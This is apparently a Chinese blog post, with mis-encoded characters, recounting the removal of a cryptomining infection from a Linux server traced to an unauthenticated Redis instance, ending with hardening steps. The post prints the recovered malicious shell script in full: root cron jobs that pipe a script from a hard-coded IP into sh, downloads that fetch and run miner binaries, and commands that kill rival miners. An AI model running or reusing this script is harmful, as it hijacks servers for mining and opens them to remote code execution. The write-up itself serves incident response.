1. 用 top 命令查看哪些進(jìn)程耗費(fèi)資源；發(fā)現(xiàn)兩個(gè)異常進(jìn)程

Paste_Image.png

2. ps -ef 查看進(jìn)程源文件

Paste_Image.png

3.關(guān)閉進(jìn)程， 找到源文件；刪除

Paste_Image.png

4.最后發(fā)現(xiàn)一個(gè)遠(yuǎn)程的病毒腳本

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://104.131.145.109/i.sh?7 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.1001" ]; then
    curl -fsSL http://104.131.145.109/1001/ddg.$(uname -m) -o /tmp/ddg.1001
fi
chmod +x /tmp/ddg.1001 && /tmp/ddg.1001

CleanTail()
{
    ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}

DoTKY()
{
    if [ ! -f "/tmp/wnTKYg" ]; then
        curl -fsSL http://104.131.145.109/wnTKYg -o /tmp/wnTKYg
    fi
    chmod +x /tmp/wnTKYg
    /tmp/wnTKYg
}

DoTKYnoAES()
{
    if [ ! -f "/tmp/wnTKYg.noaes" ]; then
        curl -fsSL http://104.131.145.109/wnTKYg.noaes -o /tmp/wnTKYg.noaes
    fi
    chmod +x /tmp/wnTKYg.noaes
    /tmp/wnTKYg.noaes
}


ps auxf|grep -v grep|grep "AnXqV"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" || DoTKY
ps auxf|grep -v grep|grep "wnTKYg" || DoTKYnoAES

5. 事故原因

  網(wǎng)上搜索后得知是 redis 的一個(gè)漏洞，主要利用 redis 安裝后沒(méi)有設(shè)置密碼和限制登錄來(lái)源，使用
redis-cli -h IP 就可以直接遠(yuǎn)程登錄 redis

6. 解決方法

1. 設(shè)置 redis 密碼
2. 限制遠(yuǎn)程登錄的來(lái)源 IP
3. 不使用 root 用戶運(yùn)行 redis